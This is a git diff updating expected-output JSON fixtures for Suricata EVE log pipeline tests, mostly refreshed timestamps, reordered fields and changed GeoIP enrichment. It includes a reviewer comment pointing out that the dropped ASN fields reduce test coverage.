@@ -1549,8 +1537,13 @@ "flow_id": "1887239765714716" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.598007600Z", + "ingested": "2021-12-14T14:55:20.366681752Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}}", "category": [ "network" @@ -1560,9 +1553,25 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T02:03:36.578Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.0.2.15" + ] + }, "destination": { "port": 53, "address": "10.0.2.3" @@ -1578,27 +1587,6 @@ "type": "query", "id": "9104" }, - "source": { - "port": 48288, - "address": "10.0.2.15", - "ip": "10.0.2.15" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T02:03:36.578Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.0.2.15" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", 
@@ -1613,8 +1601,13 @@ "flow_id": "2181951993205289" } }, + "source": { + "port": 48288, + "address": "10.0.2.15", + "ip": "10.0.2.15" + }, "event": { - "ingested": "2021-12-09T13:45:26.598013Z", + "ingested": "2021-12-14T14:55:20.366682107Z", "original": "{\"timestamp\":\"2019-08-23T02:03:36.578089+0000\",\"flow_id\":2181951993205289,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":48288,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":9104,\"rrname\":\"www.elastic.co\",\"rrtype\":\"A\",\"tx_id\":0}}", "category": [ "network" @@ -1624,9 +1617,25 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T02:03:36.578Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.0.2.15" + ] + }, "destination": { "port": 53, "address": "10.0.2.3" @@ -1642,27 +1651,6 @@ "type": "query", "id": "12859" }, - "source": { - "port": 59203, - "address": "10.0.2.15", - "ip": "10.0.2.15" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T02:03:36.578Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.0.2.15" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", 
@@ -1677,8 +1665,13 @@ "flow_id": "928596784370390" } }, + "source": { + "port": 59203, + "address": "10.0.2.15", + "ip": "10.0.2.15" + }, "event": { - "ingested": "2021-12-09T13:45:26.598017400Z", + "ingested": "2021-12-14T14:55:20.366682466Z", "original": "{\"timestamp\":\"2019-08-23T02:03:36.578262+0000\",\"flow_id\":928596784370390,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":59203,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":12859,\"rrname\":\"www.elastic.co\",\"rrtype\":\"AAAA\",\"tx_id\":0}}", "category": [ "network" @@ -1688,9 +1681,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T02:03:36.619Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "175.16.199.1", + "10.0.2.3" + ] + }, "destination": { "port": 48288, "address": "10.0.2.15" @@ -1749,28 +1759,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T02:03:36.619Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "175.16.199.1", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", 
@@ -1785,8 +1773,13 @@ "flow_id": "2181951993205289" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.598022800Z", + "ingested": "2021-12-14T14:55:20.366682814Z", "original": "{\"timestamp\":\"2019-08-23T02:03:36.619381+0000\",\"flow_id\":2181951993205289,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":48288,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":9104,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"A\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":150,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"}]}}", "category": [ "network" @@ -1796,9 +1789,28 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-23T02:03:36.626Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "2a04:4e42:0200:0000:0000:0000:0000:0729", + "2a04:4e42:0400:0000:0000:0000:0000:0729", + "10.0.2.3" + ] + }, "destination": { "port": 59203, "address": "10.0.2.15" 
@@ -1857,30 +1869,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T02:03:36.626Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "2a04:4e42:0200:0000:0000:0000:0000:0729", - "2a04:4e42:0400:0000:0000:0000:0000:0729", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -1895,8 +1883,13 @@ "flow_id": "928596784370390" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.598028100Z", + "ingested": "2021-12-14T14:55:20.366683269Z", "original": "{\"timestamp\":\"2019-08-23T02:03:36.626559+0000\",\"flow_id\":928596784370390,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":59203,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":12859,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"AAAA\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":269,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0200:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0400:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}]}}", "category": [ "network" 
@@ -1906,6 +1899,13 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } } ] diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log-expected.json b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log-expected.json index 9d0d9645126..db197451f6b 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log-expected.json +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log-expected.json @@ -17,19 +17,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", 
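Review bot: The regenerated expectation for 175.16.199.1 drops `source.as.number` and `source.as.organization.name` entirely, so this pipeline test no longer verifies that ASN enrichment runs at all and a regression in the geoip ASN step would now pass unnoticed. The geo fields are merely relabelled (`CN-JL` → `CN-22`, `Jilin` → `Jilin Sheng`, plus a new `city_name`), which is consistent with a database refresh, but the whole `as` block vanishing looks like the new test GeoIP database simply has no ASN entry for this address rather than an intentional pipeline change. If that is the case, it would be worth either adding ASN data for the test address to the test database or stating in the package changelog that ASN assertions were removed, so the coverage gap is explicit rather than silent. This hunk shows only the `source` object; the rest of the event is outside it.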
@@ -151,7 +146,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:45:29.262566900Z", + "ingested": "2021-12-14T14:55:23.036415272Z", "original": "{\"timestamp\":\"2021-01-27T01:28:11.488362+0100\",\"flow_id\":1805461738637437,\"in_iface\":\"enp6s0\",\"event_type\":\"alert\",\"src_ip\":\"175.16.199.1\",\"src_port\":80,\"dest_ip\":\"10.31.64.240\",\"dest_port\":47592,\"proto\":\"TCP\",\"ether\":{\"src_mac\":\"00:03:2d:3f:e5:63\",\"dest_mac\":\"00:1b:17:00:01:18\"},\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2100498,\"rev\":7,\"signature\":\"GPL ATTACK_RESPONSE id check returned root\",\"category\":\"Potentially Bad Traffic\",\"severity\":2,\"metadata\":{\"protocols\":[\"tcp\",\"smtp\"],\"mitre_attack\":[\"t1190\"],\"cvss_v2_temporal\":[\"7.9\"],\"cve\":[\"2019-91325\"],\"cvss_v3_temporal\":[\"7.1\"],\"attack_target\":[\"smtp-server\",\"server\"],\"cvss_v2_base\":[\"8.1\"],\"rule_source\":[\"acme-rule-factory\"],\"priority\":[\"medium\"],\"filename\":[\"exploit.rules\"],\"updated_at\":[\"2019-06-11\"],\"capec_id\":[\"248\"],\"created_at\":[\"2019-06-01\"],\"hostile\":[\"src_ip\"],\"cvss_v3_base\":[\"7.3\"],\"cwe_id\":[\"20\"]}},\"http\":{\"hostname\":\"testmynids.org\",\"url\":\"/uid/index.html\",\"http_user_agent\":\"curl/7.58.0\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":200,\"length\":39},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":496,\"bytes_toclient\":876,\"start\":\"2021-01-22T23:28:38.673917+0100\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log-expected.json b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log-expected.json index 8da063a5247..dc52426d093 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log-expected.json 
+++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log-expected.json @@ -37,7 +37,7 @@ "ip": "192.168.86.85" }, "event": { - "ingested": "2021-12-09T13:45:29.680219800Z", + "ingested": "2021-12-14T14:55:23.439672828Z", "original": "{\"timestamp\":\"2018-07-05T15:01:09.820360-0400\",\"flow_id\":298824096901438,\"in_iface\":\"en0\",\"event_type\":\"ssh\",\"src_ip\":\"192.168.86.85\",\"src_port\":55406,\"dest_ip\":\"192.168.253.112\",\"dest_port\":22,\"proto\":\"TCP\",\"ssh\":{\"client\":{\"proto_version\":\"2.0\",\"software_version\":\"OpenSSH_7.6\"},\"server\":{\"proto_version\":\"2.0\",\"software_version\":\"libssh_0.7.0\"}}}", "category": [ "network" @@ -126,7 +126,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:45:29.680225600Z", + "ingested": "2021-12-14T14:55:23.439675097Z", "original": "{\"timestamp\":\"2018-07-05T15:07:20.910626-0400\",\"flow_id\":904992230150281,\"in_iface\":\"en0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.86.85\",\"src_port\":55641,\"dest_ip\":\"192.168.156.70\",\"dest_port\":443,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2024833,\"rev\":3,\"signature\":\"ET POLICY Observed IP Lookup Domain (l2 .io in TLS SNI)\",\"category\":\"Potential Corporate Privacy Violation\",\"severity\":1},\"tls\":{\"session_resumed\":true,\"sni\":\"l2.io\",\"version\":\"TLS 1.2\"},\"app_proto\":\"tls\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":793,\"bytes_toclient\":343,\"start\":\"2018-07-05T15:07:19.659593-0400\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -199,7 +199,7 @@ } }, "event": { - "ingested": "2021-12-09T13:45:29.680230400Z", + "ingested": "2021-12-14T14:55:23.439675485Z", "original": "{\"timestamp\":\"2018-07-05T15:43:47.690014-0400\",\"flow_id\":2115002772430095,\"in_iface\":\"en0\",\"event_type\":\"http\",\"src_ip\":\"192.168.86.85\",\"src_port\":56119,\"dest_ip\":\"192.168.86.28\",\"dest_port\":63963,\"proto\":\"TCP\",\"tx_id\":0,\"http\":{\"hostname\":\"192.168.86.28\",\"url\":\"\\/dd.xml\",\"http_user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\",\"http_content_type\":\"text\\/xml\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1155}}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -298,7 +298,7 @@ } }, "event": { - "ingested": "2021-12-09T13:45:29.680234200Z", + "ingested": "2021-12-14T14:55:23.439675822Z", "original": "{\"timestamp\":\"2018-07-05T15:44:33.222441-0400\",\"flow_id\":2211411903323127,\"in_iface\":\"en0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.86.28\",\"src_port\":8008,\"dest_ip\":\"192.168.86.85\",\"dest_port\":56118,\"proto\":\"TCP\",\"http\":{\"hostname\":\"192.168.86.28\",\"url\":\"\\/ssdp\\/device-desc.xml\",\"http_user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\",\"http_content_type\":\"application\\/xml\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1071},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/ssdp\\/device-desc.xml\",\"gaps\":false,\"state\":\"CLOSED\",\"md5\":\"427b7337ff37eeb24d74f47d8e04cf21\",\"sha1\":\"313573490192c685e9e53abef25453ed0d5e2aee\",\"sha256\":\"f610428ebddf6f8cf9e39322e672583c45fcdcf885efad0ab48fd53a3dfc2c4b\",\"stored\":false,\"size\":1071,\"tx_id\":0}}", "category": [ "network" 
@@ -321,6 +321,16 @@ } }, { + "@timestamp": "2018-07-05T19:51:20.213Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "175.16.199.1", + "192.168.86.1" + ] + }, "destination": { "port": 39464, "address": "192.168.86.85" @@ -346,28 +356,6 @@ }, "type": "answer" }, - "source": { - "port": 53, - "address": "192.168.86.1", - "ip": "192.168.86.1" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2018-07-05T19:51:20.213Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "175.16.199.1", - "192.168.86.1" - ] - }, "suricata": { "eve": { "in_iface": "en0", @@ -384,8 +372,13 @@ "flow_id": "1684780223079543" } }, + "source": { + "port": 53, + "address": "192.168.86.1", + "ip": "192.168.86.1" + }, "event": { - "ingested": "2021-12-09T13:45:29.680238700Z", + "ingested": "2021-12-14T14:55:23.439676148Z", "original": "{\"timestamp\":\"2018-07-05T15:51:20.213418-0400\",\"flow_id\":1684780223079543,\"in_iface\":\"en0\",\"event_type\":\"dns\",\"src_ip\":\"192.168.86.1\",\"src_port\":53,\"dest_ip\":\"192.168.86.85\",\"dest_port\":39464,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":12308,\"rcode\":\"NOERROR\",\"rrname\":\"clients.l.google.com\",\"rrtype\":\"A\",\"ttl\":299,\"rdata\":\"175.16.199.1\"}}", "category": [ "network" @@ -395,6 +388,13 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { 
@@ -562,7 +562,7 @@ } }, "event": { - "ingested": "2021-12-09T13:45:29.680244100Z", + "ingested": "2021-12-14T14:55:23.439676475Z", "original": "{\"timestamp\":\"2018-07-05T15:51:23.009510-0400\",\"event_type\":\"stats\",\"stats\":{\"uptime\":5400,\"capture\":{\"kernel_packets\":430313,\"kernel_drops\":0,\"kernel_ifdrops\":0},\"decoder\":{\"pkts\":430313,\"bytes\":335138381,\"invalid\":2,\"ipv4\":425873,\"ipv6\":3785,\"ethernet\":430313,\"raw\":0,\"null\":0,\"sll\":0,\"tcp\":370093,\"udp\":58337,\"sctp\":0,\"icmpv4\":186,\"icmpv6\":1019,\"ppp\":0,\"pppoe\":0,\"gre\":0,\"vlan\":0,\"vlan_qinq\":0,\"ieee8021ah\":0,\"teredo\":1,\"ipv4_in_ipv6\":0,\"ipv6_in_ipv6\":0,\"mpls\":0,\"avg_pkt_size\":778,\"max_pkt_size\":1514,\"erspan\":0,\"ipraw\":{\"invalid_ip_version\":0},\"ltnull\":{\"pkt_too_small\":0,\"unsupported_type\":0},\"dce\":{\"pkt_too_small\":0}},\"flow\":{\"memcap\":0,\"tcp\":1113,\"udp\":1881,\"icmpv4\":0,\"icmpv6\":677,\"spare\":10000,\"emerg_mode_entered\":0,\"emerg_mode_over\":0,\"tcp_reuse\":0,\"memuse\":11537312},\"defrag\":{\"ipv4\":{\"fragments\":0,\"reassembled\":0,\"timeouts\":0},\"ipv6\":{\"fragments\":0,\"reassembled\":0,\"timeouts\":0},\"max_frag_hits\":0},\"tcp\":{\"sessions\":842,\"ssn_memcap_drop\":0,\"pseudo\":0,\"pseudo_failed\":0,\"invalid_checksum\":0,\"no_flow\":0,\"syn\":1138,\"synack\":656,\"rst\":1165,\"segment_memcap_drop\":0,\"stream_depth_reached\":63,\"reassembly_gap\":0,\"overlap\":5979,\"overlap_diff_data\":0,\"insert_data_normal_fail\":0,\"insert_data_overlap_fail\":0,\"insert_list_fail\":0,\"memuse\":4587520,\"reassembly_memuse\":768000},\"detect\":{\"alert\":2},\"app_layer\":{\"flow\":{\"http\":22,\"ftp\":0,\"smtp\":0,\"tls\":560,\"ssh\":4,\"imap\":0,\"msn\":0,\"smb\":0,\"dcerpc_tcp\":0,\"dns_tcp\":0,\"failed_tcp\":2,\"dcerpc_udp\":0,\"dns_udp\":762,\"failed_udp\":1119},\"tx\":{\"http\":25,\"ftp\":0,\"smtp\":0,\"tls\":0,\"ssh\":0,\"smb\":0,\"dcerpc_tcp\":0,\"dns_tcp\":0,\"dcerpc_udp\":0,\"dns_udp\":762}},\"flow_mgr\":{\"closed_pru
ned\":729,\"new_pruned\":1879,\"est_pruned\":975,\"bypassed_pruned\":0,\"flows_checked\":8,\"flows_notimeout\":8,\"flows_timeout\":0,\"flows_timeout_inuse\":0,\"flows_removed\":0,\"rows_checked\":65536,\"rows_skipped\":65530,\"rows_empty\":0,\"rows_busy\":0,\"rows_maxlen\":2},\"file_store\":{\"open_files\":0},\"dns\":{\"memuse\":7749,\"memcap_state\":0,\"memcap_global\":0},\"http\":{\"memuse\":17861,\"memcap\":0}}}", "category": [ "network" @@ -575,23 +575,6 @@ ] }, { - "destination": { - "port": 443, - "address": "17.142.164.13", - "domain": "p33-btmmdns.icloud.com" - }, - "source": { - "port": 56187, - "address": "192.168.86.85", - "ip": "192.168.86.85" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "tls", - "transport": "tcp" - }, "@timestamp": "2018-07-05T19:51:50.666Z", "ecs": { "version": "1.12.0" @@ -604,6 +587,11 @@ "192.168.86.85" ] }, + "destination": { + "port": 443, + "address": "17.142.164.13", + "domain": "p33-btmmdns.icloud.com" + }, "suricata": { "eve": { "in_iface": "en0", 
@@ -655,8 +643,13 @@ "version": "1.2", "version_protocol": "tls" }, + "source": { + "port": 56187, + "address": "192.168.86.85", + "ip": "192.168.86.85" + }, "event": { - "ingested": "2021-12-09T13:45:29.680248300Z", + "ingested": "2021-12-14T14:55:23.439676810Z", "original": "{\"timestamp\":\"2018-07-05T15:51:50.666597-0400\",\"flow_id\":89751777876473,\"in_iface\":\"en0\",\"event_type\":\"tls\",\"src_ip\":\"192.168.86.85\",\"src_port\":56187,\"dest_ip\":\"17.142.164.13\",\"dest_port\":443,\"proto\":\"TCP\",\"tls\":{\"subject\":\"CN=*.icloud.com, OU=management:idms.group.506364, O=Apple Inc., ST=California, C=US\",\"issuerdn\":\"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US\",\"serial\":\"5C:9C:E1:09:78:87:F8:07\",\"fingerprint\":\"6a:ff:ac:a6:5f:8a:05:e7:a9:8c:76:29:b9:08:c7:69:ad:dc:72:47\",\"sni\":\"p33-btmmdns.icloud.com.\",\"version\":\"TLS 1.2\",\"notbefore\":\"2017-02-27T17:54:31\",\"notafter\":\"2019-03-29T17:54:31\"}}", "category": [ "network" @@ -666,6 +659,13 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "tls", + "transport": "tcp" } }, { @@ -705,7 +705,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:45:29.680252400Z", + "ingested": "2021-12-14T14:55:23.439679061Z", "original": "{\"timestamp\":\"2018-07-05T15:51:54.001329-0400\",\"flow_id\":1828507008887644,\"event_type\":\"flow\",\"src_ip\":\"fe80:0000:0000:0000:fada:0cff:fedc:87f1\",\"src_port\":546,\"dest_ip\":\"ff02:0000:0000:0000:0000:0000:0001:0002\",\"dest_port\":547,\"proto\":\"UDP\",\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":1,\"pkts_toclient\":0,\"bytes_toserver\":110,\"bytes_toclient\":0,\"start\":\"2018-07-05T15:51:23.453468-0400\",\"end\":\"2018-07-05T15:51:23.453468-0400\",\"age\":0,\"state\":\"new\",\"reason\":\"timeout\",\"alerted\":false}}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -786,7 +786,7 @@ } }, "event": { - "ingested": "2021-12-09T13:45:29.680255700Z", + "ingested": "2021-12-14T14:55:23.439679432Z", "original": "{\"timestamp\":\"2020-12-09T16:02:43.000505+0000\",\"flow_id\":913701662641234,\"in_iface\":\"eno6\",\"event_type\":\"http\",\"src_ip\":\"192.168.50.1\",\"src_port\":57134,\"dest_ip\":\"192.168.50.1\",\"dest_port\":8080,\"proto\":\"TCP\",\"tx_id\":0,\"http\":{\"hostname\":\"ctldl.windowsupdate.com\",\"url\":\"http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?111111111111\",\"http_user_agent\":\"Microsoft-CryptoAPI/10.0\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"length\":0}}", "category": [ "network", @@ -809,22 +809,6 @@ } }, { - "destination": { - "port": 443, - "address": "192.168.50.1" - }, - "source": { - "port": 60614, - "address": "192.168.50.1", - "ip": "192.168.50.1" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "tls", - "transport": "tcp" - }, "@timestamp": "2020-12-09T16:02:58.005Z", "ecs": { "version": "1.12.0" @@ -837,6 +821,10 @@ "192.168.50.1" ] }, + "destination": { + "port": 443, + "address": "192.168.50.1" + }, "suricata": { "eve": { "in_iface": "eno6", 
@@ -890,8 +878,13 @@ "version": "1.2", "version_protocol": "tls" }, + "source": { + "port": 60614, + "address": "192.168.50.1", + "ip": "192.168.50.1" + }, "event": { - "ingested": "2021-12-09T13:45:29.680259900Z", + "ingested": "2021-12-14T14:55:23.439679758Z", "original": "{\"timestamp\":\"2020-12-09T16:02:58.005716+0000\",\"flow_id\":1298574590709840,\"in_iface\":\"eno6\",\"event_type\":\"tls\",\"src_ip\":\"192.168.50.1\",\"src_port\":60614,\"dest_ip\":\"192.168.50.1\",\"dest_port\":443,\"proto\":\"TCP\",\"tls\":{\"subject\":\"C=US, ST=New York, L=New York City, O=Acme U.S.A., INC., CN=update.acme.com\",\"issuerdn\":\"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust RSA CA 2018\",\"serial\":\"0D:CE:DC:BC:AF:92:56:B4:C5:41:40:71:26:5B:1D:53\",\"fingerprint\":\"18:3c:11:45:46:e9:26:c7:87:64:0f:ed:47:86:1b:31:bf:0f:84:25\",\"version\":\"TLS 1.2\",\"notbefore\":\"2020-11-24T00:00:00\",\"notafter\":\"2021-12-25T23:59:59\",\"ja3\":{},\"ja3s\":{\"hash\":\"adc06261ef82c2e4688b3cf08c1b2f24\",\"string\":\"771,159,65281\"}}}", "category": [ "network" @@ -901,6 +894,13 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "tls", + "transport": "tcp" } }, { @@ -961,7 +961,7 @@ } }, "event": { - "ingested": "2021-12-09T13:45:29.680265300Z", + "ingested": "2021-12-14T14:55:23.439680084Z", "original": "{\"timestamp\":\"2020-12-09T16:03:00.179037+0000\",\"flow_id\":1097935193623328,\"in_iface\":\"eno6\",\"event_type\":\"http\",\"src_ip\":\"192.168.50.1\",\"src_port\":50898,\"dest_ip\":\"192.168.50.1\",\"dest_port\":8081,\"proto\":\"TCP\",\"tx_id\":0,\"http\":{\"hostname\":\"192.168.50.1\",\"http_port\":8081,\"url\":\"/uuid\",\"http_user_agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0\",\"http_method\":\"POST\",\"protocol\":\"HTTP/1.1\",\"length\":0}}", "category": [ "network", 
@@ -989,23 +989,6 @@ } }, { - "destination": { - "port": 443, - "address": "192.168.50.1", - "domain": "www.example.com" - }, - "source": { - "port": 12509, - "address": "192.168.50.1", - "ip": "192.168.50.1" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "tls", - "transport": "tcp" - }, "@timestamp": "2020-12-09T16:03:50.083Z", "ecs": { "version": "1.12.0" @@ -1015,6 +998,11 @@ "192.168.50.1" ] }, + "destination": { + "port": 443, + "address": "192.168.50.1", + "domain": "www.example.com" + }, "suricata": { "eve": { "in_iface": "eno6", @@ -1037,8 +1025,13 @@ "ja3": "44d502d471cfdb99c59bdfb0f220e5a8" } }, + "source": { + "port": 12509, + "address": "192.168.50.1", + "ip": "192.168.50.1" + }, "event": { - "ingested": "2021-12-09T13:45:29.680271100Z", + "ingested": "2021-12-14T14:55:23.439680635Z", "original": 